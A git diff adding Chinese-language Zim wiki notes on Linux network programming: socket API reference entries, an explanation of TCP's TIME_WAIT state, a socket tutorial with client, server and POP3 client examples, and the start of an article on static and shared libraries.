EFAULT 参数optval指针指向无法存取的内存空间。
|
||||
|
||||
范例 参考getsockopt()。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
24. shutdown(终止socket通信)
|
||||
相关函数 socket,connect
|
||||
|
||||
表头文件 #include<sys/socket.h>
|
||||
|
||||
定义函数 int shutdown(int s,int how);
|
||||
|
||||
函数说明 shutdown()用来终止参数s所指定的socket连线。参数s是连线中的socket处理代码,参数how有下列几种情况:
|
||||
how=0 终止读取操作。
|
||||
how=1 终止传送操作
|
||||
how=2 终止读取及传送操作
|
||||
|
||||
返回值 成功则返回0,失败返回-1,错误原因存于errno。
|
||||
|
||||
错误代码
|
||||
|
||||
EBADF 参数s不是有效的socket处理代码[*]ENOTSOCK 参数s为一文件描述词,非socket[*]ENOTCONN 参数s指定的socket并未连线
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
25. socket(建立一个socket通信)
|
||||
相关函数 accept,bind,connect,listen
|
||||
|
||||
表头文件 #include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
|
||||
定义函数 int socket(int domain,int type,int protocol);
|
||||
|
||||
函数说明 socket()用来建立一个新的socket,也就是向系统注册,通知系统建立一通信端口。参数domain 指定使用何种的地址类型,完整的定义在/usr/include/bits/socket.h 内,底下是常见的协议:
|
||||
|
||||
PF_UNIX/PF_LOCAL/AF_UNIX/AF_LOCAL UNIX 进程通信协议[*]PF_INET?AF_INET Ipv4网络协议[*]PF_INET6/AF_INET6 Ipv6 网络协议[*]PF_IPX/AF_IPX IPX-Novell协议[*]PF_NETLINK/AF_NETLINK 核心用户接口装置[*]PF_X25/AF_X25 ITU-T X.25/ISO-8208 协议[*]PF_AX25/AF_AX25 业余无线AX.25协议[*]PF_ATMPVC/AF_ATMPVC 存取原始ATM PVCs[*]PF_APPLETALK/AF_APPLETALK appletalk(DDP)协议[*]PF_PACKET/AF_PACKET 初级封包接口
|
||||
|
||||
|
||||
参数 type有下列几种数值:
|
||||
|
||||
SOCK_STREAM 提供双向连续且可信赖的数据流,即TCP。支持
|
||||
OOB 机制,在所有数据传送前必须使用connect()来建立连线状态。
|
||||
SOCK_DGRAM 使用不连续不可信赖的数据包连接[*]SOCK_SEQPACKET 提供连续可信赖的数据包连接[*]SOCK_RAW 提供原始网络协议存取[*]SOCK_RDM 提供可信赖的数据包连接[*]SOCK_PACKET 提供和网络驱动程序直接通信。
|
||||
|
||||
protocol用来指定socket所使用的传输协议编号,通常此参考不用管它,设为0即可。
|
||||
|
||||
返回值 成功则返回socket处理代码,失败返回-1。
|
||||
|
||||
错误代码
|
||||
|
||||
EPROTONOSUPPORT 参数domain指定的类型不支持参数type或protocol指定的协议[*]ENFILE 核心内存不足,无法建立新的socket结构[*]EMFILE 进程文件表溢出,无法再建立新的socket[*]EACCESS 权限不足,无法建立type或protocol指定的协议[*]ENOBUFS/ENOMEM 内存不足[*]EINVAL 参数domain/type/protocol不合法
|
||||
|
||||
|
||||
范例 参考connect()。
|
||||
26
Zim/Programme/APUE/Linux_网络编程之TIME_WAIT状态.txt
Normal file
@@ -0,0 +1,26 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-03T21:32:39+08:00
|
||||
|
||||
====== Linux 网络编程之TIME WAIT状态 ======
|
||||
Created 星期五 03 六月 2011
|
||||
http://blog.csdn.net/feiyinzilgd/archive/2010/09/19/5894446.aspx
|
||||
{{./TIME_WAIT.jpg}}
|
||||
刚刚开始看TCP socket的4次握手终止流程图的时候,对于最后的TIME_WAIT状态不是很理解.现在在回过头来研究,发现TIME_WAIT状态是一个很微妙状态.之所以设计TIME_WAIT状态的原因有2个原因:
|
||||
|
||||
* 使得TCP的全双工连接能够可靠的终止.
|
||||
* 使得连接终止后网络上任然残余的发送给该连接的数据被丢弃而不至于被新连接接收.
|
||||
|
||||
在具体详解这两个原因之前,我们需要理解MSL(maxinum segment lifetime)这个概念.
|
||||
|
||||
每一个TCP 都必须有一个MSL值.这个值一般是2分钟,但也不是固定的,不同的系统不一样.无论是否出错或者连接被断开,总之,一个数据包在网路上能停留的最大时间是MSL.也就是说MSL是数据包的生命周期时间.操作这个时间,该数据包将会被丢弃而不被发送.而TIME_WAIT状态持续的时间是MSL的两倍,也就是2MSL时间.
|
||||
|
||||
TCP的全双工连接能够被可靠终止
|
||||
|
||||
TCP的可靠终止需要经过4次握手终止.如上图所示:首先,client 主动close,导致FIN发送给server,server接收到FIN后,给client回复一个ACK,之后,server会关闭和client的连接,即向client发送一个FIN,client接收到FIN之后,会发送一个ACK给server.此时client就进入TIME_WAIT状态.如果server没有收到ACK,server会重新发送一个FIN信息给client,client会重发ACK,server然后继续等待client发送一个ACK.这样保证了双方的可靠终止.2端都知道对方已经终止了.那么,在这个TIME_WAIT时间中,可以重发ACK,如果client没有收到FIN信息,则TCP会向server发送一个RST信息,这个信息会被server解释成error.
|
||||
|
||||
连接终止后网络上任然残留的发送到该连接的数据被丢弃而不至于被新连接接收.
|
||||
|
||||
举个例子:
|
||||
|
||||
在10.12.24.48 port:21和206.8.16.32 port:23(不必关心哪一端是server哪一端是client)之间建立了一个TCP连接A.然后此链接A被close掉了.然后此时又在10.12.24.48 port:21和206.8.16.32 port:23(不必关心哪一端是server哪一端是client)之间建立了一个新的TCP连接B.很可能A和B连接是有不同的应用程序建立的.那么,当我们close掉A之后,网络上很有可能还有属于A连接两端的数据m正在网路上被传送.而此时A被close掉了,重新建立了B连接,由于A和B连接的地址和端口都是一样的.这样,m数据就会被最终发送到B连接的两端.这样就造成了混乱,B接收到了原本数据A的数据.处于TIME_WAIT状态的连接会禁止新的同样的连接(如A,B)连接被建立.除非等到TIME_WAIT状态结束,也就是2MSL时间之后.其中,一个MSL时间是为了网络上的正在被发送到该链接的数据被丢弃,另一个MSL使得应答信息被丢弃.这样,2MSL之后,保证重新建立的所得到的数据绝对不会是发往就连接的数据.
|
||||
BIN
Zim/Programme/APUE/Linux_网络编程之TIME_WAIT状态/TIME_WAIT.jpg
Normal file
|
After Width: | Height: | Size: 29 KiB |
309
Zim/Programme/APUE/Linux下Socket编程.txt
Normal file
@@ -0,0 +1,309 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T15:20:36+08:00
|
||||
|
||||
====== Linux下Socket编程 ======
|
||||
Created 星期六 04 六月 2011
|
||||
http://www.kuqin.com/networkprog/20080512/8361.html
|
||||
什么是Socket
|
||||
Socket接口是TCP/IP网络的API,Socket接口定义了许多函数或例程,程序员可以用它们来开发TCP/IP网络上的应用程序。要学Internet上的TCP/IP网络编程,必须理解Socket接口。
|
||||
Socket接口设计者最先是将接口放在Unix操作系统里面的。如果了解Unix系统的输入和输出的话,就很容易了解Socket了。网络的 Socket数据传输是一种特殊的I/O,Socket也是一种文件描述符。Socket也具有一个类似于打开文件的函数调用Socket(),该函数返 回一个整型的Socket描述符,随后的连接建立、数据传输等操作都是通过该Socket实现的。常用的Socket类型有两种:流式Socket (SOCK_STREAM)和数据报式Socket(SOCK_DGRAM)。流式是一种面向连接的Socket,针对于面向连接的TCP服务应用;数据 报式Socket是一种无连接的Socket,对应于无连接的UDP服务应用。
|
||||
|
||||
Socket建立
|
||||
为了建立Socket,程序可以调用Socket函数,该函数返回一个类似于文件描述符的句柄。socket函数原型为:
|
||||
int socket(int domain, int type, int protocol);
|
||||
domain指明所使用的协议族,通常为PF_INET,表示互联网协议族(TCP/IP协议族);type参数指定socket的类型: SOCK_STREAM 或SOCK_DGRAM,Socket接口还定义了原始Socket(SOCK_RAW),允许程序使用低层协议;protocol通常赋值"0"。 Socket()调用返回一个整型socket描述符,你可以在后面的调用使用它。
|
||||
Socket描述符是一个指向内部数据结构的指针,它指向描述符表入口。调用Socket函数时,socket执行体将建立一个Socket,实际上"建立一个Socket"意味着为一个Socket数据结构分配存储空间。Socket执行体为你管理描述符表。
|
||||
两个网络程序之间的一个网络连接包括五种信息:通信协议、本地协议地址、本地主机端口、远端主机地址和远端协议端口。Socket数据结构中包含这五种信息。
|
||||
|
||||
Socket配置
|
||||
通过socket调用返回一个socket描述符后,在使用socket进行网络传输以前,必须配置该socket。面向连接的socket客户端通过 调用Connect函数在socket数据结构中保存本地和远端信息。无连接socket的客户端和服务端以及面向连接socket的服务端通过调用 bind函数来配置本地信息。
|
||||
Bind函数将socket与本机上的一个端口相关联,随后你就可以在该端口监听服务请求。Bind函数原型为:
|
||||
int bind(int sockfd,struct sockaddr *my_addr, int addrlen);
|
||||
Sockfd是调用socket函数返回的socket描述符,my_addr是一个指向包含有本机IP地址及端口号等信息的sockaddr类型的指针;addrlen常被设置为sizeof(struct sockaddr)。
|
||||
struct sockaddr结构类型是用来保存socket信息的:
|
||||
struct sockaddr {
|
||||
unsigned short sa_family; /* 地址族, AF_xxx */
|
||||
char sa_data[14]; /* 14 字节的协议地址 */
|
||||
};
|
||||
sa_family一般为AF_INET,代表Internet(TCP/IP)地址族;sa_data则包含该socket的IP地址和端口号。
|
||||
另外还有一种结构类型:
|
||||
struct sockaddr_in {
|
||||
short int sin_family; /* 地址族 */
|
||||
unsigned short int sin_port; /* 端口号 */
|
||||
struct in_addr sin_addr; /* IP地址 */
|
||||
unsigned char sin_zero[8]; /* 填充0 以保持与struct sockaddr同样大小 */
|
||||
};
|
||||
这个结构更方便使用。sin_zero用来将sockaddr_in结构填充到与struct sockaddr同样的长度,可以用bzero()或memset()函数将其置为零。指向sockaddr_in 的指针和指向sockaddr的指针可以相互转换,这意味着如果一个函数所需参数类型是sockaddr时,你可以在函数调用的时候将一个指向 sockaddr_in的指针转换为指向sockaddr的指针;或者相反。
|
||||
使用bind函数时,可以用下面的赋值实现自动获得本机IP地址和随机获取一个没有被占用的端口号:
|
||||
my_addr.sin_port = 0; /* 系统随机选择一个未被使用的端口号 */
|
||||
my_addr.sin_addr.s_addr = INADDR_ANY; /* 填入本机IP地址 */
|
||||
通过将my_addr.sin_port置为0,函数会自动为你选择一个未占用的端口来使用。同样,通过将my_addr.sin_addr.s_addr置为INADDR_ANY,系统会自动填入本机IP地址。
|
||||
注意在使用bind函数是需要将sin_port和sin_addr转换成为网络字节优先顺序;而sin_addr则不需要转换。
|
||||
|
||||
|
||||
计算机数据存储有两种字节优先顺序:高位字节优先和低位字节优先。Internet上数据以高位字节优先顺序在网络上传输,所以对于在内部是以低位字节优先方式存储数据的机器,在Internet上传输数据时就需要进行转换,否则就会出现数据不一致。
|
||||
下面是几个字节顺序转换函数:
|
||||
·htonl():把32位值从主机字节序转换成网络字节序
|
||||
·htons():把16位值从主机字节序转换成网络字节序
|
||||
·ntohl():把32位值从网络字节序转换成主机字节序
|
||||
·ntohs():把16位值从网络字节序转换成主机字节序
|
||||
|
||||
//对于多字节的数据类型如整型、指针、浮点型等其一个值的多个字节若在两端存取的方式不一致就会导致错误,而字符串本身就一个字节故没有问题。
|
||||
另外
|
||||
|
||||
|
||||
Bind()函数在成功被调用时返回0;出现错误时返回"-1"并将errno置为相应的错误号。需要注意的是,在调用bind函数时一般不要将端口号置为小于1024的值,因为1到1024是保留端口号,你可以选择大于1024中的任何一个没有被占用的端口号。
|
||||
|
||||
连接建立
|
||||
面向连接的客户程序使用Connect函数来配置socket并与远端服务器建立一个TCP连接,其函数原型为:
|
||||
int connect(int sockfd, struct sockaddr *serv_addr,int addrlen);
|
||||
Sockfd 是socket函数返回的socket描述符;serv_addr是包含远端主机IP地址和端口号的指针;addrlen是远端地质结构的长度。 Connect函数在出现错误时返回-1,并且设置errno为相应的错误码。进行客户端程序设计无须调用bind(),因为这种情况下只需知道目的机器 的IP地址,而客户通过哪个端口与服务器建立连接并不需要关心,socket执行体为你的程序自动选择一个未被占用的端口,并通知你的程序数据什么时候到 打断口。
|
||||
Connect函数启动和远端主机的直接连接。只有面向连接的客户程序使用socket时才需要将此socket与远端主机相连。无连接协议从不建立直接连接。面向连接的服务器也从不启动一个连接,它只是被动的在协议端口监听客户的请求。
|
||||
Listen函数使socket处于被动的监听模式,并为该socket建立一个输入数据队列,将到达的服务请求保存在此队列中,直到程序处理它们。
|
||||
int listen(int sockfd, int backlog);
|
||||
Sockfd 是Socket系统调用返回的socket 描述符;backlog指定在请求队列中允许的最大请求数,进入的连接请求将在队列中等待accept()它们(参考下文)。Backlog对队列中等待 服务的请求的数目进行了限制,大多数系统缺省值为20。如果一个服务请求到来时,输入队列已满,该socket将拒绝连接请求,客户将收到一个出错信息。
|
||||
当出现错误时listen函数返回-1,并置相应的errno错误码。
|
||||
accept()函数让服务器接收客户的连接请求。在建立好输入队列后,服务器就调用accept函数,然后睡眠并等待客户的连接请求。
|
||||
int accept(int sockfd, void *addr, int *addrlen);
|
||||
sockfd是被监听的socket描述符,addr通常是一个指向sockaddr_in变量的指针,该变量用来存放提出连接请求服务的主机的信息(某 台主机从某个端口发出该请求);addrten通常为一个指向值为sizeof(struct sockaddr_in)的整型指针变量。出现错误时accept函数返回-1并置相应的errno值。
|
||||
首先,当accept函数监视的 socket收到连接请求时,socket执行体将建立一个新的socket,执行体将这个新socket和请求连接进程的地址联系起来,收到服务请求的 初始socket仍可以继续在以前的 socket上监听,同时可以在新的socket描述符上进行数据传输操作。
|
||||
|
||||
数据传输
|
||||
Send()和recv()这两个函数用于面向连接的socket上进行数据传输。
|
||||
Send()函数原型为:
|
||||
int send(int sockfd, const void *msg, int len, int flags);
|
||||
Sockfd是你想用来传输数据的socket描述符;msg是一个指向要发送数据的指针;Len是以字节为单位的数据的长度;flags一般情况下置为0(关于该参数的用法可参照man手册)。
|
||||
Send()函数返回实际上发送出的字节数,可能会少于你希望发送的数据。在程序中应该将send()的返回值与欲发送的字节数进行比较。当send()返回值与len不匹配时,应该对这种情况进行处理。
|
||||
char *msg = "Hello!";
|
||||
int len, bytes_sent;
|
||||
……
|
||||
len = strlen(msg);
|
||||
bytes_sent = send(sockfd, msg,len,0);
|
||||
……
|
||||
recv()函数原型为:
|
||||
int recv(int sockfd,void *buf,int len,unsigned int flags);
|
||||
Sockfd是接受数据的socket描述符;buf 是存放接收数据的缓冲区;len是缓冲的长度。Flags也被置为0。Recv()返回实际上接收的字节数,当出现错误时,返回-1并置相应的errno值。
|
||||
Sendto()和recvfrom()用于在无连接的数据报socket方式下进行数据传输。由于本地socket并没有与远端机器建立连接,所以在发送数据时应指明目的地址。
|
||||
sendto()函数原型为:
|
||||
int sendto(int sockfd, const void *msg,int len,unsigned int flags,const struct sockaddr *to, int tolen);
|
||||
该函数比send()函数多了两个参数,to表示目地机的IP地址和端口号信息,而tolen常常被赋值为sizeof (struct sockaddr)。Sendto 函数也返回实际发送的数据字节长度或在出现发送错误时返回-1。
|
||||
Recvfrom()函数原型为:
|
||||
int recvfrom(int sockfd,void *buf,int len,unsigned int flags,struct sockaddr *from,int *fromlen);
|
||||
from是一个struct sockaddr类型的变量,该变量保存源机的IP地址及端口号。fromlen常置为sizeof (struct sockaddr)。当recvfrom()返回时,fromlen包含实际存入from中的数据字节数。Recvfrom()函数返回接收到的字节数或 当出现错误时返回-1,并置相应的errno。
|
||||
如果你对数据报socket调用了connect()函数时,你也可以利用send()和recv()进行数据传输,但该socket仍然是数据报socket,并且利用传输层的UDP服务。但在发送或接收数据报时,内核会自动为之加上目地和源地址信息。
|
||||
|
||||
结束传输
|
||||
当所有的数据操作结束以后,你可以调用close()函数来释放该socket,从而停止在该socket上的任何数据操作:
|
||||
close(sockfd);
|
||||
你也可以调用shutdown()函数来关闭该socket。该函数允许你只停止在某个方向上的数据传输,而一个方向上的数据传输继续进行。如你可以关闭某socket的写操作而允许继续在该socket上接受数据,直至读入所有数据。
|
||||
int shutdown(int sockfd,int how);
|
||||
Sockfd是需要关闭的socket的描述符。参数 how允许为shutdown操作选择以下几种方式:
|
||||
·0-------不允许继续接收数据
|
||||
·1-------不允许继续发送数据
|
||||
·2-------不允许继续发送和接收数据,
|
||||
·均为允许则调用close ()
|
||||
shutdown在操作成功时返回0,在出现错误时返回-1并置相应errno。
|
||||
|
||||
Socket编程实例
|
||||
代码实例中的服务器通过socket连接向客户端发送字符串"Hello, you are connected!"。只要在服务器上运行该服务器软件,在客户端运行客户软件,客户端就会收到该字符串。
|
||||
该服务器软件代码如下:
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <errno.h>
|
||||
#include <string.h>
|
||||
#include <sys/types.h>
|
||||
#include <netinet/in.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/wait.h>
|
||||
#define SERVPORT 3333 /*服务器监听端口号 */
|
||||
#define BACKLOG 10 /* 最大同时连接请求数 */
|
||||
main()
|
||||
{
|
||||
int sockfd,client_fd; /*sock_fd:监听socket;client_fd:数据传输socket */
|
||||
struct sockaddr_in my_addr; /* 本机地址信息 */
|
||||
struct sockaddr_in remote_addr; /* 客户端地址信息 */
|
||||
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
|
||||
perror("socket创建出错!"); exit(1);
|
||||
}
|
||||
my_addr.sin_family=AF_INET;
|
||||
my_addr.sin_port=__htons__(SERVPORT);
|
||||
my_addr.sin_addr.s_addr =__ INADDR_ANY__;
|
||||
__ bzero__(&(my_addr.sin_zero),8);
|
||||
if (bind(sockfd,__ (struct sockaddr *)__&my_addr, sizeof(struct sockaddr)) == -1) {
|
||||
perror("bind出错!");
|
||||
exit(1);
|
||||
}
|
||||
if (listen(sockfd, BACKLOG) == -1) {
|
||||
perror("listen出错!");
|
||||
exit(1);
|
||||
}
|
||||
while(1) {
|
||||
sin_size = sizeof(struct sockaddr_in);
|
||||
if ((client_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &sin_size)) == -1) {
|
||||
perror("accept出错");
|
||||
continue;
|
||||
}
|
||||
printf("received a connection from %s\n", inet_ntoa(remote_addr.sin_addr));
|
||||
if (!fork()) { /* 子进程代码段 */
|
||||
if (send(client_fd, "Hello, you are connected!\n", __26__, 0) == -1) //注意:这里不包括字符串的'\0',故接收端需要自己在接收的数据结尾加上'\0'
|
||||
perror("send出错!");
|
||||
close(client_fd); //其实这个语句并不会使客户端收到EOF,因为父进程的client_fd还没有关闭。
|
||||
exit(0);
|
||||
}
|
||||
__ close(client_fd);//必需的__
|
||||
}
|
||||
}
|
||||
}
|
||||
服务器的工作流程是这样的:首先调用socket函数创建一个Socket,然后调用bind函数将其与本机地址以及一个本地端口号绑定,然后调用 listen在相应的socket上监听,当accpet接收到一个连接服务请求时,将生成一个新的socket。服务器显示该客户机的IP地址,并通过 新的socket向客户端发送字符串"Hello,you are connected!"。最后关闭该socket。
|
||||
代码实例中的fork()函数生成一个子进程来处理数据传输部分,fork()语句对于子进程返回的值为0。所以包含fork函数的if语句是子进程代码部分,它与if语句后面的父进程代码部分是并发执行的。
|
||||
|
||||
客户端程序代码如下:
|
||||
#include<stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <errno.h>
|
||||
#include <string.h>
|
||||
#include <netdb.h>
|
||||
#include <sys/types.h>
|
||||
#include <netinet/in.h>
|
||||
#include <sys/socket.h>
|
||||
#define SERVPORT 3333
|
||||
#define MAXDATASIZE 100 /*每次最大数据传输量 */
|
||||
main(int argc, char *argv[]){
|
||||
int sockfd, recvbytes;
|
||||
char buf[MAXDATASIZE];
|
||||
struct hostent *host;
|
||||
struct sockaddr_in serv_addr;
|
||||
if (argc < 2) {
|
||||
fprintf(stderr,"Please enter the server's hostname!\n");
|
||||
exit(1);
|
||||
}
|
||||
if((host=**gethostbyname**(argv[1]))==NULL) { //这个函数现在已经过时了,一般用getaddrinfo()
|
||||
herror("gethostbyname出错!");
|
||||
exit(1);
|
||||
}
|
||||
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
|
||||
perror("socket创建出错!");
|
||||
exit(1);
|
||||
}
|
||||
serv_addr.sin_family=AF_INET;
|
||||
serv_addr.sin_port=htons(SERVPORT);
|
||||
serv_addr.sin_addr = *((struct in_addr *)host->h_addr);
|
||||
bzero(&(serv_addr.sin_zero),8);
|
||||
if (connect(sockfd, (struct sockaddr *)&serv_addr, \
|
||||
sizeof(struct sockaddr)) == -1) {
|
||||
perror("connect出错!");
|
||||
exit(1);
|
||||
}
|
||||
if ((recvbytes=recv(sockfd, buf, MAXDATASIZE, 0)) ==-1) {
|
||||
perror("recv出错!");
|
||||
exit(1);
|
||||
}
|
||||
__ buf[recvbytes] = '\0';__
|
||||
printf("Received: %s",buf);
|
||||
close(sockfd);
|
||||
}
|
||||
客户端程序首先通过服务器域名获得服务器的IP地址,然后创建一个socket,调用connect函数与服务器建立连接,连接成功之后接收从服务器发送过来的数据,最后关闭socket。
|
||||
函数gethostbyname()是完成域名转换的。由于IP地址难以记忆和读写,所以为了方便,人们常常用域名来表示主机,这就需要进行域名和IP地址的转换。函数原型为:
|
||||
struct hostent *gethostbyname(const char *name);
|
||||
函数返回为hosten的结构类型,它的定义如下:
|
||||
struct hostent {
|
||||
char *h_name; /* 主机的官方域名 */
|
||||
char **h_aliases; /* 一个以NULL结尾的主机别名数组 */
|
||||
int h_addrtype; /* 返回的地址类型,在Internet环境下为AF-INET */
|
||||
int h_length; /* 地址的字节长度 */
|
||||
char **h_addr_list; /* 一个以0结尾的数组,包含该主机的所有地址*/
|
||||
};
|
||||
#define h_addr h_addr_list[0] /*在h-addr-list中的第一个地址*/
|
||||
当 gethostname()调用成功时,返回指向struct hosten的指针,当调用失败时返回-1。当调用gethostbyname时,你不能使用perror()函数来输出错误信息,而应该使用herror()函数来输出。
|
||||
|
||||
无连接的客户/服务器程序的在原理上和连接的客户/服务器是一样的,两者的区别在于无连接的客户/服务器中的客户一般不需要建立连接,而且在发送接收数据时,需要指定远端机的地址。
|
||||
|
||||
阻塞和非阻塞
|
||||
阻塞函数在完成其指定的任务以前不允许程序调用另一个函数。例如,程序执行一个读数据的函数调用时,在此函数完成读操作以前将不会执行下一程序语句。当 服务器运行到accept语句时,而没有客户连接服务请求到来,服务器就会停止在accept语句上等待连接服务请求的到来。这种情况称为阻塞 (blocking)。而非阻塞操作则可以立即完成。比如,如果你希望服务器仅仅注意检查是否有客户在等待连接,有就接受连接,否则就继续做其他事情,则 可以通过将Socket设置为非阻塞方式来实现。非阻塞socket在没有客户在等待时就使accept调用立即返回。
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
……
|
||||
sockfd = socket(AF_INET,SOCK_STREAM,0);
|
||||
fcntl(sockfd,F_SETFL,O_NONBLOCK);
|
||||
……
|
||||
通过设置socket为非阻塞方式,可以实现"轮询"若干Socket。当企图从一个没有数据等待处理的非阻塞Socket读入数据时,函数将立即返 回,返回值为-1,并置errno值为EWOULDBLOCK。但是这种"轮询"会使CPU处于忙等待方式,从而降低性能,浪费系统资源。而调用 select()会有效地解决这个问题,它允许你把进程本身挂起来,而同时使系统内核监听所要求的一组文件描述符的任何活动,只要确认在任何被监控的文件 描述符上出现活动,select()调用将返回指示该文件描述符已准备好的信息,从而实现了为进程选出随机的变化,而不必由进程本身对输入进行测试而浪费 CPU开销。Select函数原型为:
|
||||
int select(int numfds,fd_set *readfds,fd_set *writefds,
|
||||
fd_set *exceptfds,struct timeval *timeout);
|
||||
其中readfds、writefds、exceptfds分别是被select()监视的读、写和异常处理的文件描述符集合。如果你希望确定是否可以 从标准输入和某个socket描述符读取数据,你只需要将标准输入的文件描述符0和相应的sockdtfd加入到readfds集合中;numfds的值 是需要检查的号码最高的文件描述符加1,这个例子中numfds的值应为sockfd+1;当select返回时,readfds将被修改,指示某个文件 描述符已经准备被读取,你可以通过FD_ISSSET()来测试。为了实现fd_set中对应的文件描述符的设置、复位和测试,它提供了一组宏:
|
||||
FD_ZERO(fd_set *set)----清除一个文件描述符集;
|
||||
FD_SET(int fd,fd_set *set)----将一个文件描述符加入文件描述符集中;
|
||||
FD_CLR(int fd,fd_set *set)----将一个文件描述符从文件描述符集中清除;
|
||||
FD_ISSET(int fd,fd_set *set)----试判断是否文件描述符被置位。
|
||||
Timeout参数是一个指向struct timeval类型的指针,它可以使select()在等待timeout长时间后没有文件描述符准备好即返回。struct timeval数据结构为:
|
||||
struct timeval {
|
||||
int tv_sec; /* seconds */
|
||||
int tv_usec; /* microseconds */
|
||||
};
|
||||
|
||||
POP3客户端实例
|
||||
下面的代码实例基于POP3的客户协议,与邮件服务器连接并取回指定用户帐号的邮件。与邮件服务器交互的命令存储在字符串数组POPMessage中,程序通过一个do-while循环依次发送这些命令。
|
||||
#include<stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <errno.h>
|
||||
#include <string.h>
|
||||
#include <netdb.h>
|
||||
#include <sys/types.h>
|
||||
#include <netinet/in.h>
|
||||
#include <sys/socket.h>
|
||||
#define POP3SERVPORT 110
|
||||
#define MAXDATASIZE 4096
|
||||
|
||||
main(int argc, char *argv[]){
|
||||
int sockfd;
|
||||
struct hostent *host;
|
||||
struct sockaddr_in serv_addr;
|
||||
char *POPMessage[]={
|
||||
"USER userid\r\n",
|
||||
"PASS password\r\n",
|
||||
"STAT\r\n",
|
||||
"LIST\r\n",
|
||||
"RETR 1\r\n",
|
||||
"DELE 1\r\n",
|
||||
"QUIT\r\n",
|
||||
NULL
|
||||
};
|
||||
int iLength;
|
||||
int iMsg=0;
|
||||
int iEnd=0;
|
||||
char buf[MAXDATASIZE];
|
||||
|
||||
if((host=gethostbyname("your.server"))==NULL) {
|
||||
perror("gethostbyname error");
|
||||
exit(1);
|
||||
}
|
||||
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
|
||||
perror("socket error");
|
||||
exit(1);
|
||||
}
|
||||
serv_addr.sin_family=AF_INET;
|
||||
serv_addr.sin_port=htons(__POP3SERVPORT__);
|
||||
serv_addr.sin_addr = *((struct in_addr *)host->h_addr);
|
||||
bzero(&(serv_addr.sin_zero),8);
|
||||
if (connect(sockfd, (struct sockaddr *)&serv_addr,sizeof(struct sockaddr))==-1){
|
||||
perror("connect error");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
do {
|
||||
send(sockfd,POPMessage[iMsg],strlen(POPMessage[iMsg]),0);
|
||||
printf("have sent: %s",POPMessage[iMsg]);
|
||||
|
||||
iLength=recv(sockfd,buf+iEnd,sizeof(buf)-iEnd,0);
|
||||
iEnd+=iLength;
|
||||
buf[iEnd]='\0';
|
||||
printf("received: %s,%d\n",buf,iMsg);
|
||||
|
||||
iMsg++;
|
||||
} while (POPMessage[iMsg]);
|
||||
|
||||
close(sockfd);
|
||||
}
|
||||
|
||||
来自:Linux下Socket编程
|
||||
|
||||
1007
Zim/Programme/APUE/Linux下通用线程池的创建与使用.txt
Normal file
357
Zim/Programme/APUE/Linux程序库的构建和使用.txt
Normal file
@@ -0,0 +1,357 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-05T15:58:59+08:00
|
||||
|
||||
====== Linux程序库的构建和使用 ======
|
||||
Created Tuesday 05 April 2011
|
||||
|
||||
====== Linux程序库的构建和使用 ======
|
||||
2010-08-05 10:26:44 来源: 作者: 浏览:116次 评论:0条
|
||||
http://php.lampbrother.net/html/42-1/1170.htm
|
||||
|
||||
在本文里,我们将探索与Linux的程序库有关的知识。首先,我们考察**静态库**的基本知识,并介绍如何使用__ar__命令来建立静态库。然后,我们将学习**共享库**方面的知识,并讲述可以**动态加载的共享库**的有关内容。
|
||||
|
||||
===== 一、什么是程序库 =====
|
||||
|
||||
通俗的讲,**一个程序库就是目标程序文件的一个集合**。如果某些目标文件提供了解决一个特定问题的所需功能,我们就可以把这些目标文件归并为一个程序库,从而让应用开发者更易于访问这些目标文件,省得到处去找。
|
||||
|
||||
对于静态库,我们可以用实用程序ar来建立。当应用程序开发人员利用程序库进行程序的编译和连接时,程序库中为应用程序所需的那些元件就会**集成到最终生成的的可执行程**序中。之后,因为程序库已经融入应用程序的映像之中,成为它密不可分的一部分了,所以对应用程序来说,已经没什么外部的程序库可言了。
|
||||
|
||||
共享程序库(或者动态程序库)也会连接到一个应用程序的映像上,不过需要两个不同的步骤。第一步发生在**构建应用程序之时**,**链接程序**检查是否在应用程序或者程序库内部找到了构建应用程序所需的**全部符号(函数名或变量名)**。第二步发生在**运行时**,动态加载器把所需的共享库载入内存,然后动态地把它链接到应用程序的映像之中。注意,这里与静态程序库不同,这次并没有把共享程序库中的所需元件放入应用程序的映像之中。很明显,这样生成的应用程序映像较小,因为共享程序库和应用程序的映像是相互独立的。
|
||||
|
||||
虽然共享库能够节约内存,但是这是有代价的——必须在运行时解析程序库。很明显,要想弄清需要哪些库,然后寻找这些库并将其载入内存肯定是需要一定时间的。
|
||||
|
||||
本文中,我们会建立两个程序库,一个静态库和一个动态库,并以各自的方式应用于程序之中,以此亲身体验两者之间的区别。
|
||||
|
||||
===== 二、静态库的创建和使用 =====
|
||||
|
||||
相对于动态链接库,静态库要简单一些,它被静态的链接到应用程序的映像之中。这意味着,映像一旦建好,外部程序库的有无对映像的执行将毫无影响,因为所需的部分已经放进程序二进制映像了。
|
||||
|
||||
下面我们来演示如何用一组源文件来构造一个程序库。我们建立的程序库是用来封装GNU/Linux的随机函数的,这样我们的库就可以**对外提供**随机数生成器了。现在看一下我们的**程序库为应用程序提供的接口**(API),我们将其放在头文件randapi.h中,如下所示:
|
||||
|
||||
01 //randapi.h,我们的程序库的接口
|
||||
02
|
||||
03 #ifndef __RAND_API_H
|
||||
04 #define __RAND_API_H
|
||||
05
|
||||
06 extern void initRand( void );
|
||||
07 extern float getSRand( void );
|
||||
08 extern int getRand( int max );
|
||||
09
|
||||
10 #endif /* __RAND_API_H */
|
||||
|
||||
